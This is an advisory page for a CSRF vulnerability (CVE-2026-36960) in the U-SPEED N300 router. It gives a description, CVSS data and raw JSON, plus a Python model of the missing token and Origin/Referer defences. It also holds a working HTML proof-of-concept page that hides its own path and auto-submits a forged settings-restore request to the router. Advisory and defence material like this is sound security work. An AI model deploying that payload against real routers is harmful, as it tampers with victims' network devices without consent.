Security Vulnerability Report
CVE-2026-36960 CVSS 8.8 HIGH


Published: 2026-04-30 16:16:43
Last Modified: 2026-04-30 17:16:32

Description

A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the U-SPEED N300 Rounter V1.0.0. The device does not implement CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available for this entry. The affected product, as named in the advisory text, is:

U-SPEED N300 Rounter V1.0.0 (the spelling used by the advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- PoC for CSRF vulnerability in U-SPEED N300 Rounter V1.0.0 -->
<!-- This HTML page simulates a request to change router settings -->
<html>
<body>
  <!-- Rewrite the visible URL to "/" so the address bar does not reveal the PoC path -->
  <script>history.pushState('', '', '/')</script>
  <!-- Cross-origin POST to the settings-restore endpoint; the victim's browser attaches the admin session cookie -->
  <form action="http://<ROUTER_IP>/goform/SysToolRestore" method="POST">
    <input type="hidden" name="SETTINGS" value="RESTORE" />
    <input type="hidden" name="CURRENT_PAGE" value="index" />
    <input type="submit" value="Submit request" />
  </form>
  <script>
    // Automatically submit the form when the victim loads the page
    document.forms[0].submit();
  </script>
</body>
</html>
```
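The two controls the description says are absent (a per-session anti-CSRF token and strict Origin/Referer validation) can be modelled and exercised against a request shaped exactly like the PoC above. The following is an added example, not U-SPEED firmware code: the endpoint path and form fields are taken from the PoC, while the management origin `ROUTER_ORIGIN`, the attacker origin, the cookie name `session` and the token field `csrf_token` are assumptions chosen for illustration. `vulnerable_handler` reproduces the behaviour the advisory describes (only the session cookie is checked); `hardened_handler` is the corrected form.

```python
"""Added example (not U-SPEED code): model of the CSRF defences the advisory
says are missing, exercised with a request shaped like the PoC page.

Assumed for illustration: ROUTER_ORIGIN, ATTACKER_ORIGIN, the "session" cookie
name and the "csrf_token" form field. Taken from the PoC: the endpoint path
/goform/SysToolRestore and the SETTINGS / CURRENT_PAGE fields.
"""
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

ROUTER_ORIGIN = "http://192.168.0.1"          # assumed management origin
ATTACKER_ORIGIN = "http://attacker.example"   # constructed, for the forged request


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    cookies: dict
    form: dict


@dataclass
class SessionStore:
    """Maps session id -> per-session anti-CSRF (synchroniser) token."""
    sessions: dict = field(default_factory=dict)

    def login(self) -> tuple[str, str]:
        sid, token = secrets.token_hex(16), secrets.token_hex(16)
        self.sessions[sid] = token
        return sid, token


def _origin_of(url: str) -> str:
    """Normalise a URL (or Origin value) to scheme://host[:port], lowercased."""
    p = urlsplit(url)
    return f"{p.scheme.lower()}://{p.netloc.lower()}"


def origin_allowed(headers: dict) -> bool:
    """Strict Origin/Referer check. Origin is authoritative when present
    (browsers send it on cross-site form POSTs; the literal "null" normalises
    to an empty origin and is rejected). Fall back to Referer, and reject a
    state-changing request that carries neither header."""
    if "Origin" in headers:
        return _origin_of(headers["Origin"]) == ROUTER_ORIGIN
    if "Referer" in headers:
        return _origin_of(headers["Referer"]) == ROUTER_ORIGIN
    return False


def vulnerable_handler(req: Request, store: SessionStore) -> bool:
    """Behaviour the advisory describes: a valid session cookie is all that
    /goform/* needs to act on the request."""
    return req.cookies.get("session") in store.sessions


def hardened_handler(req: Request, store: SessionStore) -> bool:
    """Same endpoint with a synchroniser token plus Origin/Referer validation."""
    sid = req.cookies.get("session")
    if sid not in store.sessions or req.method != "POST":
        return False
    if not origin_allowed(req.headers):
        return False
    token = req.form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(token, store.sessions[sid])


def forged_request(sid: str) -> Request:
    """What the PoC page produces: the browser adds the admin's cookie and an
    Origin header naming the attacker's site; the attacker knows no token."""
    return Request("POST", "/goform/SysToolRestore",
                   headers={"Origin": ATTACKER_ORIGIN},
                   cookies={"session": sid},
                   form={"SETTINGS": "RESTORE", "CURRENT_PAGE": "index"})


def legitimate_request(sid: str, token: str) -> Request:
    """The same form submitted from the router's own UI, carrying the token."""
    return Request("POST", "/goform/SysToolRestore",
                   headers={"Origin": ROUTER_ORIGIN},
                   cookies={"session": sid},
                   form={"SETTINGS": "RESTORE", "CURRENT_PAGE": "index",
                         "csrf_token": token})


def demo() -> dict:
    """Run both handlers over a forged and a legitimate request."""
    store = SessionStore()
    sid, token = store.login()
    forged, legit = forged_request(sid), legitimate_request(sid, token)
    return {
        "vulnerable_accepts_forged": vulnerable_handler(forged, store),
        "hardened_accepts_forged": hardened_handler(forged, store),
        "hardened_accepts_legit": hardened_handler(legit, store),
    }


if __name__ == "__main__":
    print(demo())
```

Either control alone would stop the PoC page, but they fail differently: the Origin/Referer check depends on headers the browser controls (and some privacy settings strip Referer, which is why a missing Referer is only accepted when Origin vouches for the request), while the token survives a permissive origin check as long as it stays unguessable and per-session. Marking the session cookie `SameSite=Lax` is a useful third layer but not a substitute, since it relies on client behaviour the device cannot verify.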

References

http://u-speed.com (vendor site)
https://github.com/kirubel-cve/CVE-2026-36960 (PoC / advisory repository)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-36960",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T16:16:43.300",
    "lastModified": "2026-04-30T17:16:31.920",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the U-SPEED N300 Rounter V1.0.0. The device does not implement CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-352" }
        ]
      }
    ],
    "references": [
      { "url": "http://u-speed.com", "source": "[email protected]" },
      { "url": "https://github.com/kirubel-cve/CVE-2026-36960", "source": "[email protected]" },
      { "url": "https://github.com/kirubel-cve/CVE-2026-36960", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0" }
    ]
  }
}
```